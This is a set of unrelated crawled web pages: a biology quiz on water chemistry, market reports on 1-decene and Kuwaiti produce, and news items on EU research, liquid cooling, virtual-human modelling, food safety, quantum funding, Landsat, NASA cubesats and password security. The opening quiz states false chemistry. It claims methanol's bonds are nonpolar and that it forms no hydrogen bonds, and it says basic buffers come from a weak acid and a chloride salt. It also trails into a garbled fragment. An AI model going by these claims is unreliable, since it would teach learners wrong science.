59) Identical heat lamps are arranged to shine on two identical containers, one containing water and one methanol (wood alcohol), so that each liquid absorbs the same amount of energy minute by minute. The covalent bonds of methanol molecules are nonpolar, so there are no hydrogen bonds among methanol molecules. Which of the following graphs correctly describes what will happen to the temperature of the water and the methanol?
60) You have two beakers. One contains pure water, the other contains pure methanol (wood alcohol). The covalent bonds of methanol molecules are nonpolar, so there are no hydrogen bonds among methanol molecules. You pour crystals of table salt (NaCl) into each beaker. Predict what will happen.
A) Equal amounts of NaCl crystals will dissolve in both water and methanol.
B) NaCl crystals will not dissolve in either water or methanol.
C) NaCl crystals will dissolve readily in water but will not dissolve in methanol.
D) NaCl crystals will dissolve readily in methanol but will not dissolve in water.
61) Define a buffer and provide an example.
A buffer solution is one which resists changes in pH when small quantities of an acid or a base are added to it.
An acidic buffer solution is simply one which has a pH less than 7. Acidic buffer solutions are commonly made from a weak acid and one of its salts usually sodium salt. An example is carbonic acid + Na carbonate, the buffer which modulates the pH of blood.
A basic buffer solution is simply one which has a pH greater than 7. Basic buffer solutions are commonly made from a weak acid and one of its salts usually chloride salt. An example is ammonium hydroxide + ammonium chloride.
62) Consider the following reaction at equilibrium: What would be the effect of adding additional H2CO3?
A) It would drive the equilibrium dynamics to the right.
B) It would drive the equilibrium dynamics to the left.
C) Nothing would happen, because the reactants and products are in equilibrium.
D) The amounts of CO2 and H2O would decrease.
63) Which of the following statements is true about buffer solutions?
A) They maintain a constant pH when bases are added to them but not when acids are added to them.
B) They maintain a constant pH when acids are added to them but not when bases are added to them.
C) They fluctuate in pH when either acids or bases are added to them.
D) They maintain a relatively constant pH when either acids or bases are added to them.
64) Increased atmospheric CO2 concentrations might have what effect on seawater?
A) Seawater will become more alkaline, and carbonate concentrations will decrease.
B) There will be no change in the pH of seawater, because carbonate will turn to bicarbonate.
C) Seawater will become more acidic, and carbonate concentrations will decrease.
D) Seawater will become more acidic, and carbonate concentrations will increase.
65) How would acidification of seawater affect marine organisms? Acidification of seawater would _____.
A) increase dissolved carbonate concentrations and promote faster growth of corals and shell-building animals
B) decrease dissolved carbonate concentrations and promote faster growth of corals and shell-building animals
C) increase dissolved carbonate concentrations and hinder growth of corals and shell-building animals
D) decrease dissolved carbonate concentrations and hinder growth of corals and shell-building animals
66) If the cytoplasm of a cell is at pH 7, and the mitochondrial matrix is at pH 8, then the concentration of H+ ions _____.
A) is 10 times higher in the cytoplasm than in the mitochondrial matrix
B) is 10 times higher in the mitochondrial matrix than in the cytoplasm
C) in the cytoplasm is 7/8 the concentration in the mitochondrial matrix
D) in the cytoplasm is 8/7 the concentration in the mitochondrial matrix
67) The loss of water from a plant by transpiration cools the leaf. Movement of water in transpiration requires both adhesion to the conducting walls and wood fibers of the plant and cohesion of the molecules to each other. A scientist wanted to increase the rate of transpiration of a crop species to extend its range into warmer climates. The scientist substituted a nonpolar solution with an atomic mass similar to that of water for hydrating the plants. What do you expect the scientist’s data will indicate from this experiment?
A) The rate of transpiration will be the same for both water and the nonpolar substance.
B) The rate of transpiration will be slightly lower with the nonpolar substance as the plant will not have evolved with the nonpolar compound.
C) Transpiration rates will fall to zero as nonpolar compounds do not have the properties necessary for adhesion and cohesion.
D) Transpiration rates will increase as nonpolar compounds undergo adhesion and cohesion with wood fibers more readily than water.
68) In living systems molecules involved in hydrogen bonding almost always contain either oxygen or nitrogen or both. How do you explain this phenomenon?
A) Oxygen and nitrogen are elements found in both nucleic acids and proteins.
B) Oxygen and nitrogen are elements with very high attractions for their electrons.
C) Oxygen and nitrogen are elements found in fats and carbohydrates.
D) Oxygen and nitrogen were both components of gases that made up the early atmosphere on Earth.
13an 7. Acidic buffer solutions are commonly made from a weak acid and one of its salts usually sodium salt. An example is carbonic acid + Na carbonate, the buffer which modulates the pH of blood.
C) Seawater will become more acidic, and carb | <urn:uuid:52918777-7765-448a-8d8a-d865bbcbe3eb> | CC-MAIN-2017-04 | https://docs.com/orlando-yturriaga/3305/chap-3-hw-water-answers-9 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00300-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.901566 | 5,160 | 3.46875 | 3 |
Decene is an unsaturated aliphatic hydrocarbon and its isomerization depends largely on the position and geometry of the double bond. It is an alkene (C10H20), containing ten carbon atoms and a distinguishable double bond. The positional isomers 1-decene and 3-decene are known as decene, however, 1-decene is industrially important isomer.
1-Decene is produced by employing the industrial process of oligomerization of ethylene, using the Ziegler Process or by cracking of the petrochemical waxes. The production of 1-Decene may vary according to the customer’s requirements; it could be from few metric tons to hundred thousand metric tons.
This alpha-olefin is used as monomer in copolymers, and it is an intermediate in the production of epoxides, amines, oxo alcohols, synthetic lubricants, synthetic fatty acids and alkylated aromatics. Also, 1-decene is used as a feedstock for the production of surfactants (alkyl aromatics and detergent alcohols), and in the production of linear alkyl benzene sulfonates that are used in lube-oil additives, all purpose cleaners, dishwashing liquids and laundry detergents.
1-Decene is used in lubricants, detergent alcohols and oilfield chemicals, among others, however, under certain conditions (presence of various catalysts-acids), it may undergo exothermic addition polymerization reactions and attack some forms of plastic. If 1-decene is present in high concentration, its presence may cause irritation to the eyes and the respiratory track.
Alfa Olefins are sensitive to moisture and therefore contact with air or oxygen should be avoided, as auto-oxidation forms impurities, which gives rise to subsequent reactions. They should be kept in dry atmospheric conditions and handled under inert gas atmosphere. With all the hydrocarbons, alpha olefins can form explosive mixtures with oxygen or air in certain concentrations. Besides, 1-decene is stored under nitrogen blanket and is not corrosive to steel or aluminium.
In Western Europe, the surfactant consumption of linear alkylbenzene sulfonates, soaps and other surfactants is largely in the household sector (41%), followed by industrial sector (39%) and personal care (20%). Europe is expected to see a growth of 0.5–1.0%, for the forecast period (2012-18).
1-Decene is segmented into applications and companies. It is used in applications, such as alkylbenzenes, linear & branched, alpha olefin sulfonates (AOS), detergent alcohols, lubricant and oilfield chemicals. The different companies that are part of 1-decene are Dow Chemical Company, Evonik Industries AG, Exxon Mobil Corp, Godrej Industries Ltd., and Mitsubishi Chemical Corporation.
Please fill in the form below to receive a free copy of the Summary of this Report
Please visit http://www.micromarketmonitor.com/custom-research-services.html to specify your custom Research Requirement | <urn:uuid:6b6f997e-59cd-47c8-a0b7-2d5955ef54c2> | CC-MAIN-2017-04 | http://www.micromarketmonitor.com/market/europe-1-decene-2523613387.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00328-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.903103 | 667 | 3.4375 | 3 |
Kuwait has about 10% of the world’s oil reserves. Petroleum accounts for at least half of its GDP income and 95% of its revenue from exports. The country’s growing economy is mostly due to its revenue from oil exports. The agriculture sector plays a minor role in the growth of the country’s economy. Kuwait imports most of its fruits and vegetables, as the domestic production capability is low due to the unfavorable climate, soil infertility and water scarcity. The fruit market in Kuwait reached XXX thousand metric tons in 2017 and is expected to reach XXX thousand metric tons by 2022. The Kuwait vegetable market reached XXX thousand metric tons in 2017 and expected to reach XXX thousand metric tons by 2022. The increasing market for fruits and vegetables in Kuwait is attributed to the growing disposable incomes of the people and the increasing health concerns of the Kuwaiti population.
The country has a total arable land of about 10600 hectors, which is about 0.6% of the total land area. This domestic production capacity is not enough to cater to the growing demand for fruits and vegetables. Kuwait is the second most populated country in the GCC region, with the average population growth rate of 3.5%. The country has low domestic production capabilities for fruits and vegetables, as the soil in the region is low in organic content, low-nutrient holding abilities, and poor moisture retaining capacity. The natural water resources required for irrigation are minimal, with most of the water used being from desalination plants, which consume a lot of electricity; domestic farmers are not able to bear the costs, as there are no subsidies for electricity. Thus, the harsh climatic conditions, and vulnerable water and soil resources are the major constraints faced by the agriculture sector in Kuwait; hence, the country is mostly dependent on import of fruits and vegetables.
The government of Kuwait is encouraging agricultural companies to invest in foreign countries that have a comparative advantage in producing certain crops and import their products back into Kuwait. The crops targeted by this initiative include wheat, rice, barley, yellow corn, soybeans, and green forage. The Kuwaiti government is providing financial incentives to encourage investors in the country to take part in this food security initiative and invest overseas.
Market Segmentation - By Fresh Fruits and Vegetables
The agricultural market in Kuwait is segmented by type of products into fruits and vegetables. These are sub-segmented into onions, potatoes, tomatoes, garlic, cauliflower, cucumber, cabbage, beans, eggplant, lemons, apples, bananas, oranges, grapes, strawberry, watermelon, grapefruit, dates, and olives.
About the Market | <urn:uuid:29bc4a41-9edf-4136-9290-16062460584b> | CC-MAIN-2017-04 | https://www.mordorintelligence.com/industry-reports/fruits-and-vegetables-industry-in-kuwait-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00052-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940576 | 538 | 2.671875 | 3 |
Robots, brains, the EU’s got it all.
The public sector isn’t renowned for its speed of innovation, but the EU is a different story. With a Digital Agenda, it’s innovating in all sorts of exciting areas that have the potential to shape the world around us for decades to come.
Here CBR takes a look at some of the best projects.
The Human Brain Project
Launched in October last year, this ambitious scheme sets out to map the human brain. Covering researchers from 15 EU states and nearly 200 research institutes, the EU committed €1bn back in January 2013 to the project in order to finance 10 years of study.
It should collect all the data the world has collected about the brain, and store it in completely new computer science technology.
European Commission VP Neelie Kroes, responsible for the Digital Agenda, said last month: "The brain is a fascinating thing. Digital tools enable us to make huge progress in understanding the brain, but also to learn from it: from better treatment of brain diseases, to building the next generation of supercomputers."
Another €8.3m in March this year provided enough cash to get another 32 organisations from 13 more countries on board, whose job it is to collect data and work on developing the groundwork for six ICT platforms dedicated to Neuroinformatics, Brain Simulation, High Performance Computing, Medical Informatics, Neuromorphic Computing and Neurorobotics. | <urn:uuid:6c4103fb-43f1-478c-90ab-8c2e0e985174> | CC-MAIN-2017-04 | http://www.cbronline.com/news/enterprise-it/it-network/5-big-eu-tech-projects-you-should-follow-4214352 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00226-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.918321 | 307 | 2.59375 | 3 |
One of the greatest challenges to high compute densities is cooling: at a certain point, air no longer suffices to remove the waste heat that tightly packed equipment produces. Thus, high-density data center deployments, supercomputers and other high-performance-computing (HPC) applications are increasingly turning to liquid cooling. The recent SC13 supercomputing conference saw one particular kind of liquid cooling—immersion—make a strong showing, according to DatacenterDynamics. Immersion cooling involves submerging servers in a nonconducting liquid, avoiding the need to pipe liquid in a rack or even inside a server box or processor enclosure.
Liquid cooling creates certain infrastructure challenges that air avoids, but in cases where high performance is required, the costs may be justified. In addition, since it enables higher densities while maintaining safe operating temperatures, it means that precious resources like data center space can be conserved, forestalling the need to build new facilities to create more space.
Read more about liquid cooling | <urn:uuid:3425bf1d-b467-4530-9885-52f0a5680983> | CC-MAIN-2017-04 | http://www.datacenterjournal.com/liquid-cooling-aids-supercomputing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00531-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.882112 | 206 | 2.90625 | 3 |
Based on the number of prominent research projects currently in the works, 2014 could be a tipping point for the field of personalized medicine and in silico research. Last week, the Insigneo Institute at the University of Sheffield spotlighted its Virtual Physiological Human (VHP) program, which the project’s backers describe as “transcending sci fi and transforming healthcare.”
The goal of the VHP project is to create an in silico replica of a living human body to enable drug testing and other medical treatments. The model will be used directly in clinical practice to improve diagnosis and outcome.
Founded one year ago, the institute is celebrating the first phase of the technology. The program is funded by the European Commission, which has invested nearly €220 million since 2007 to advance in silico projects across Europe.
VHP will rely on integrated computer models of the mechanical, physical and biochemical functions of a living human body that enable it to operate as a cohesive whole. In fact, a main aim for the project is to facilitate a paradigm change in which the body is seen as a single multi organ system instead of as a collection of individual organs.
The project has already made a lot of headway in its first year, addressing a wide range of medical problems, including pulmonary disease, coronary artery disease, bone fractures and Parkinson’s Disease.
“What we’re working on here will be vital to the future of healthcare,” stated Dr. Keith McCormack, who leads business development at the Institute. “Pressures are mounting on health and treatment resources worldwide. Candidly, without in silico medicine, organisations like the NHS will be unable to cope with demand. The Virtual Physiological Human will act as a software-based laboratory for experimentation and treatment that will save huge amounts of time and money and lead to vastly superior treatment outcomes.”
The Insigneo Institute for in silico Medicine includes more than 120 academics and clinicians who are collaborating to develop computer simulations of the human body and its disease processes. The researchers expect that once the virtual human is complete, it will be the most advanced application of computing technology in healthcare. | <urn:uuid:c8e2908e-15f0-4225-a42f-46a76bd650e0> | CC-MAIN-2017-04 | https://www.hpcwire.com/2014/05/19/virtual-human-program-aims-transform-healthcare/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00347-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.939045 | 444 | 2.671875 | 3 |
Debunking the top foodborne illness-related myths
Tuesday, Jul 30th 2013
Although many restaurants and food service providers do everything they can to ensure the safety and quality of their products, including using state-of-the-art temperature monitoring equipment for their cold storage units, foodborne illness still afflicts millions of Americans every year. According to the Centers for Disease Control and Prevention, one out of every six U.S. residents becomes sick from food poisoning every year, representing close to 48 million people in total. Furthermore, approximately 128,000 end up in the hospital and 3,000 perish annually because of a foodborne illness.
Many factors contribute to these statistics, but one of the main reasons is that many diners and restaurant managers erroneously think that their practices and standards are good enough. However, these assumptions are often based on myth, and their prevalence results in many people unnecessarily falling ill every year. In particular, here are the top three foodborne illness-related myths to keep in mind:
1) Government inspectors always stop violators
Local, state and federal officials work hard to cite food service institutions that break the rules relating to food safety. However, these agencies are simply not able to stop everyone. For instance, a behind-the-scenes video shot by a Golden Corral employee earlier this year showed that one restaurant manager supposedly hid meat and cooking supplies in a back alley to prevent government inspectors from noticing a number of certain health code violations.
"In this case, and perhaps hundreds more around the country that go unnoticed, it seems management chose deception over honesty," Richard Console of the law firm Console and Hollawell wrote in a July blog post. "It's a big gamble. On one side there's the need to keep the business open, and on the other is the state's requirement that the restaurant follow proper health and safety regulations. Shady restaurant owners who decide to game the system turn health inspectors into police officers when all these professionals try to do is prevent foodborne illnesses and help owners avoid lawsuits."
2) Only meat can lead to food poisoning
In many cases, especially in high-profile incidents, the noted cause of a particular outbreak is an animal protein, be it fish, shellfish, poultry or red meat. However, this does not mean that fruits and vegetables are immune from being the root cause of a foodborne illness. According to the CDC, plant-based foods such as grains, vegetables, fruits and nuts can all lead to food poisoning and as such should be carefully stored in a room equipped with the proper temperature monitoring equipment.
3) Alcohol kills all bad pathogens
Although alcohol can act as a disinfectant, no restaurant owner or patron should think that a stiff drink will protect them. Instead, the only real way to prevent the spread of foodborne illnesses, according to Console, is to keep surfaces clean and to ensure that food is at the right temperature at all times. This means that dishes should be cooked to at least 140 degrees Fahrenheit, and cold storage units containing everything from cheese and milk to steaks and lettuce should be 40 degrees or cooler.
"Violating health code standards isn't acceptable, and by that I mean it's illegal," Console wrote. "Those who ignore them willfully walk a dangerous line of liability when their actions harm others. We have more at stake here than just a sea of upset stomachs and a couple days spent in bed. People die every year from foodborne illnesses that may have been prevented had restaurant owners or manufacturers held their products and employees to the letter of state and federal health statutes. Let's not wait for another teen with a cell phone and YouTube account to expose a restaurant's sneaky (and dangerous) food practices before we take more proactive steps." | <urn:uuid:0fc94066-ef78-464a-8a3c-f263fb9d498b> | CC-MAIN-2017-04 | http://www.itwatchdogs.com/environmental-monitoring-news/cold-storage/debunking-the-top-foodborne-illness-related-myths-483215 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00255-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.96465 | 763 | 2.59375 | 3 |
Google maps feature lets you physically locate your network resources on a map. This enables network administrators to have a feel of how distributed their network is and more importantly for quick and easier drill down to resource-specific information. Information on up to 3 top interfaces linked to a router is shown in the map. The Google Map settings lists all the devices and their corresponding location.This page gives you the option to place each of the devices in their respective locations
Assigning a location to a router
Clicking on the Assign link opens up the Google map. Follow the instructions below to place a device on the map:
1. Click on the location to place the device on the map. Use the controls
on the top left to navigate or zoom
2. You will see an image indicating your selection
3. To change the location click on the image, it will vanish and then select a new location
4. Enter the location in the 'Location Name' field and hit "Save location"
Now a location has been assigned to a router.
Editing a location
To edit a specific location on the map, click on the "Edit" link under the Google Map Settings tab. Now the map view will open up with the location you had last specified. To edit it ( to move the pointer to the desired location) click on the area of the map where you think it should point to. The last location you spot(click) in the course of locating your resource through "n" different clicks on the map is taken as the final.
Deleting a location
You may remove any resource/ router from being shown on the map by clicking on the delete button against the resource in the Google Map Settings tab. | <urn:uuid:0c1874b6-c3d2-4071-9217-2ca8761b2ab5> | CC-MAIN-2017-04 | https://www.manageengine.com/products/netflow/help/admin-operations/google-map-settings.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00163-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.88276 | 350 | 2.546875 | 3 |
Resilience is one of the buzz words that is running a muck in our emergency management profession today. While once we sought to be disaster resistant, today we want to be resilient. The term is a better one than disaster resistant to describe the end state that we are seeking. For an academic look at what it means to be resilient see Building Resilient Communities: A Preliminary Framework for Assessment
An abstract of the paper is below:
"There is a growing need in the fields of homeland security and disaster management for a comprehensive, yet useful approach to building resilient communities. This article moves beyond the ongoing debate over definitions and presents a preliminary framework for assessing community resilience. Pulling from an interdisciplinary body of theoretical and policy-oriented literature, the authors provide a definition of resilience and develop a theory of community resilience as a function of resource robustness and adaptive capacity. Moving forward, the article develops the groundwork for further operationalization of resilience attributes according to five key community subsystems: ecological, economic, physical infrastructure, civil society, and governance. Through the examination of each community subsystem, a preliminary, community-based, resilience assessment framework is provided for continued development and refinement. When fully developed, the framework will serve as tool for guiding planning and allocating resources."
One thing for sure is that resilience is not measured by the number of widgets you buy with Homeland Security funds. It is grounded in the economics of a community and even the governance of the regional community trying to pull itself out of a disaster.
George Baker shared the link. | <urn:uuid:c0bbcd34-9f37-4f01-9aca-2c5cea34b271> | CC-MAIN-2017-04 | http://www.govtech.com/em/emergency-blogs/disaster-zone/Defining-Disaster-Resilience.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00071-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.925849 | 313 | 2.765625 | 3 |
Last week, the UK government announced that it is investing £270 million toward quantum computing research as part of the government’s long-term economic plan. The funds will be divided among five quantum technology centers over the next five years.
The initiative was announced as part of Chancellor George Osborne’s Autumn Statement, delivered last week in the House of Commons. The network of quantum technology centers is part of the government’s strategy for promoting growth through scientific progress.
The effort supports the creation of new applications and industries – from quantum computation to secure communication.
While conventional computing follows the laws of classical physics, quantum computing adheres to the laws of quantum mechanics, which are radically different. In a quantum computer, the fundamental unit of information is the quantum bit, or qubit. Qubits can exist in the two binary states that we’re all familiar with, but can also exist in a superposition of those two states, allowing for the representation of an unlimited number of states simultaneously. Quantum computing is thus naturally parallel and immensely powerful.
A holy grail for scientists, quantum computing is one those areas that seems to always be on the horizon, never quite within reach. While the pace of progress can seem slow, the last five years have seen substantial movement in the field with several sites boasting quantum processors. NASA and Google jointly own a D-Wave system, which is essentially the world’s first quantum computer, although there’s some debate between scientists over the exact meaning of “quantum computer.”
One thing that experts do agree on is that security protocols, like encryption and decryption, are sure to be a killer app. Governments, naturally, are paying close attention to this technology.
Other supporting measures of the Science and Innovation strategy will:
+ create a £75 million a year fund to improve the research and innovation capacity of Emerging Powers and build valuable research partnerships for the UK
+ establish a Global Collaborative Space Programme. The government will introduce a Global Collaborative Space Programme as an international pillar to our national space policy. A fund of £80 million over five years will enable UK scientists and companies to build stronger links with emerging powers in developing space capabilities and technology
+ ensure that UK industry and the wider public benefit from the development of driverless cars including a review, reporting by end 2014, to ensure the legislative and regulatory framework supports the world’s car companies to develop and test driverless cars in the UK, and a prize fund of £10 million for a town or city to develop as a test site for consumer testing of driverless cars
+ establish the Higgs Centre at Edinburgh University, named in honour of British Nobel laureate Peter Higgs. The centre will provide cutting edge academic instrumentation and big data capabilities to support high tech start ups and academic researchers specialising in astronomy and particle physics
+ invest £5 million during 2014-15 in a large scale electric vehicle-readiness programme for public sector fleets. The programme aims to promote the adoption of ultra low emission vehicles, demonstrating clear leadership by the public sector to encourage future wide-spread acceptance
Source: 2013 Autumn Statement | <urn:uuid:ff68dbc7-d299-4cef-8e60-222a97dc7781> | CC-MAIN-2017-04 | https://www.hpcwire.com/2013/12/11/uk-invests-270-million-quantum-computing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00493-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.928808 | 640 | 2.90625 | 3 |
Take a picture, and 4D app gives you the details
- By Patrick Marshall
- Feb 05, 2013
Second of four parts
Imagine taking a picture of an unfamiliar building or a piece of machinery and then having the picture tells you what’s inside the building or how that machine works. That’s part of the idea behind Hybrid 4-Dimensional Augmented Reality (HD4AR), a project of the MAGNUM Group at Virginia Tech University.
The project, led by Jules White, a professor of electrical and computer engineering at the university, can use a smart phone’s sensors, geotagging features, camera and video and audio recorders to augment situational awareness for first responders, construction crews or the public.
When it receives an image, HD4AR draws on a database of information to deliver annotated data to images on the phones. A user might, for example, take a photo of a piece of equipment. HD4AR would locate a similar image in its database and then deliver attached data — such as labels for the dials and levers on the equipment and perhaps a link to a user manual — to be superimposed on the image on the user’s cell phone. Or, send HD4AR a photo of a downtown street and it would be returned with buildings and stores identified.
“The idea behind this project is to create a framework where, when there was a disaster, people who were trapped in different areas could be using their smart phones to essentially provide situational awareness data to first responders or other citizen scientists in the area,” White said. “It can be image data, taking pictures of things, in-capture audio, video, accelerometer data, these types of things. From our perspective it was more about capturing that data, geo-tagging it all, and having it centralized in a location that first responders could look through.”
HD4AR also is designed as a tool for construction sites, taking the place of all those design drawings, but the framework also holds value for consumers. Suppose you go out in the morning and find your car battery needs a jump-start — and, as luck would have it, jump-starting a car is not something you know how to do. “So you take a photo of your engine and then on your photographs we will figure out where the positive and negative terminals are on the battery and we will annotate your photograph," White said.
The information flow goes both ways, too. “Anybody can add to the database using their phone,” he said. “From those photos we will build a crude 3-D model. So when the user goes into the photo and begins annotating it, drawing in information, we then figure out where on the 3-D model those notes go.
“When that information is saved in the database and when a new photo is taken — with a completely different angle and orientation — we can figure out which of those annotations that the first person created should be visible in the second person's photograph and then render them into that place in the photograph.”
The biggest challenge was to accommodate the processing and matching of photos taken from different angles, at different times of day and with physical changes over time. “We designed all the algorithms to be able to handle change and ambiguity in the images,” White said, citing as examples obstructions such as people walking in front of the camera or walls that change over time.
“We can tolerate a large amount of change before things start giving us trouble,” he said. “A wall may double in height and we can still often recognize that wall based on the original imagery that we have of it.”
White said the technology, which received an Innovation Award at January’s Consumer Electronics Show in Las Vegas, has been licensed to a startup company, PAR Works Inc.
The Virginia Tech group has been working on other innovative ways to manage mobile devices, including a modified version of the Android operating system that lets admins set rules for when users can access data or run certain apps, according to such factors as their location or the time of day.
PREVIOUS: Smart phones as sensors: locating snipers, or parking spots
NEXT: When smart-phone technology hits the wall | <urn:uuid:f48d62d0-5989-4a1f-af48-9affe6640ab2> | CC-MAIN-2017-04 | https://gcn.com/articles/2013/02/05/4d-app-gives-annotated-details-pictures.aspx?admgarea=TC_EMERGINGTECH | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00401-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955284 | 888 | 2.625 | 3 |
Not all of the programs operated by the U.S. government are household names, like Social Security or “Obamacare.” But some, even if little-known, are world-historic in scope and vision. One of these is the Landsat program.
Since 1972, the Landsat program has collected satellite data about the surface of the Earth. Eight satellites, now, have been built and shot toward space, some lasting far longer than they were expected to, one failing to reach orbit. In May, the Landsat program gained its newest satellite, Landsat 8. It has been producing imagery through the summer.
The Landsat program is the oldest continuously-operated program of its type, anywhere. Its satellites have created a precious and irreplaceable archive, and to sever the continuity of that archive would be a tremendous loss for science. It would also be a problem for the businesses in agriculture and forestry which use its data extensively.
So how will the government shutdown affect the Landsat program?
Landsat 7 and 8, the two satellites still operational, will “continue mission essential operations,” the U.S. Geological Survey announced. This means they’ll sense the Earth — which, since they’re already up in orbit, is relatively cheap for the government — and beam those data down to Earth.
Once on Earth, the data will be archived by the United States Geological Survey. It won’t be processed into the kind of data that scientists and businesses are used to working with, though, until after the government restarts. The data may also not be available at all online until then, too.
So the government shutdown, in the short term, will do little to hinder the Landsat program and the invaluable data it creates. It will introduce inefficiencies, though, and those will benefit no one. | <urn:uuid:b4728744-fbe1-45b1-a0be-f3a1e712d29f> | CC-MAIN-2017-04 | http://www.nextgov.com/defense/2013/10/how-shutdown-will-affect-one-quiet-crucial-set-satellites/71110/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00273-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950518 | 382 | 3.640625 | 4 |
NASA recently said it has picked three of the 11 cubesats it will send along with the first Space Launch System (SLS) rocket which could blast off in the 2017/2018 timeframe.
The 70-metric-ton SLS will stand 321 feet tall, offer 8.4 million pounds of thrust at liftoff, weigh 5.5 million pounds and carry 154,000 pounds of payload. The first SLS mission—Exploration Mission 1—in 2017 will launch an unmanned Orion spacecraft to demonstrate the integrated system performance of the SLS rocket and spacecraft prior to a mission with astronauts onboard.
+More on Network World: Graphene is hot, hot, hot+
Onboard the mission and tucked inside the ring connecting Orion to the top propulsion stage of the SLS will be 11 self-contained small satellites, each about the size of a large shoebox, NASA said.
“About 10 minutes after Orion and its service module escape the pull of Earth’s gravity, the two will disconnect and Orion will proceed toward the moon. Once Orion is a safe distance away, the small payloads will begin to be deployed, all at various times during the flight depending on the particular missions. No pyrotechnic devices will be a part of the payloads and each will be ejected with a spring mechanism – similar to opening a lid on a toy jack-in-the-box.
These cubesats are nano-satellites designed to be efficient and versatile. The masses of these secondary payloads are light -- no heavier than 30 pounds (14 kilograms) -- and will not require any extra power from the rocket to work. They will essentially piggyback on the SLS flight, providing what otherwise would be costly access to deep space,” NASA said.
The first three cubesats include:
The BioSentinel: The BioSentinel mission will be the first time living organisms have traveled to deep space in more than 40 years and the spacecraft will operate in the deep space radiation environment during its 18-month mission. BioSentinel will use yeast to detect, measure and compare the impact of deep-space radiation on living organisms over long durations beyond low Earth orbit (LEO). Since the unique deep space radiation environment cannot be replicated on or near Earth, the BioSentinel mission is one way to help inform us of the greatest risks to humans exploring beyond LEO, so that appropriate radiation protections can be developed and those dangers can be mitigated, NASA stated.
NEA Scout: Near-Earth Asteroid Scout will perform reconnaissance of an asteroid using a cubesat and solar sail propulsion [via the Largest solar sail – 85 meters -- ever deployed by the US space program], which offers navigation agility during cruise for approaching the target. Propelled by sunlight, NEA Scout will flyby and observe a small asteroid (<300 feet in diameter), taking pictures and observing its position in space, the asteroid’s shape, rotational properties, spectral class, local dust and debris field, regional morphology and regolith properties. The data collected will enhance the current understanding of asteroid environments, NASA said.
Lunar Flashlight: Resources at destinations in space, such as atmospheres, water ice and regolith, can be broken down into their component molecules and used as building materials, propellant, oxygen for humans to breathe and drinking water. This capability, known as in-situ resource utilization is most useful for human explorers if the ISRU “power plants” are deployed to locations that are rich in the required resources. NASA’s Lunar Flashlight will demonstrate this scouting capability from lunar orbit by performing multiple passes of the surface to look for ice deposits and identifying favorable locations for in-situ resource extraction and utilization. Lunar Flashlight will use a large solar sail, similar to the NEA Scout sail, to reflect sunlight and illuminate permanently shadowed craters at the lunar poles. A spectrometer will then observe the reflected light to measure the surface water ice. The spacecraft will make repeated measurements over multiple points in the craters, creating a map of the surface ice concentration, NASA said.
It will be interesting to see if these solar sail propulsion systems actually make it to the missions as few have been tested in space. The Japan Aerospace Exploration Agency‘s IKAROS (Interplanetary Kite-craft Accelerated by Radiation Of the Sun) mission being the first successful sustained use of the technology in 2010. NASA’s Sunjammer solar sail test has been delayed a number of times in the past but funding for the project continues to appear in the space agency’s budget plans.
The other eight cubesat missions/slots have not been selected yet.
Check out these other hot stories: | <urn:uuid:1eca3959-43e5-4e3d-8d1c-278c9a855df5> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2906376/education/nasa-yeast-flashlight-and-solar-sailing-key-parts-of-first-big-rocket-mission.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00511-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.900952 | 977 | 3.609375 | 4 |
A report issued this week claimed that a Russian cybercrime group stole 1.2 billion usernames and passwords from 420,000 websites.
While some security experts question the report’s findings, Symantec asserts the potential threats are important to take seriously, and recommends consumers take five steps now to protect their most sensitive password protected information:
Pay special attention to your email credentials: A lot of users fail to recognize that their email account can be a front door to their entire digital life. Think about how many times you may have reset your password on some other site and the recovery link is sent to your email account. In addition, avoid opening emails from unknown senders and clicking on suspicious email attachments; exercise caution when clicking on enticing links sent through email, instant messages, or posted on social networks; and do not share confidential information when replying to an email.
Change passwords on important sites: It’s a good idea to immediately change passwords for sites that hold a lot of personal information, financial details, and other private data. Cyber criminals who have your credentials could try to use them to access more information on these accounts. This is particularly true if you have used the same password on multiple sites. Attackers will often try to use stolen credentials on multiple sites.
Create stronger passwords: When changing your password, make sure that your new password is a minimum of eight characters long, and that it doesn’t contain your real name, username, or any other personally identifying information. The best passwords include a combination of uppercase and lowercase letters, numbers, and special characters.
Don’t re-use passwords: Once a hacker has your account information and credentials, they’ll try to use it to gain access to all your accounts. This is why it’s important to create a unique password for each account. If you vary your passwords across multiple logins, they won’t be able to access other sites with the same information.
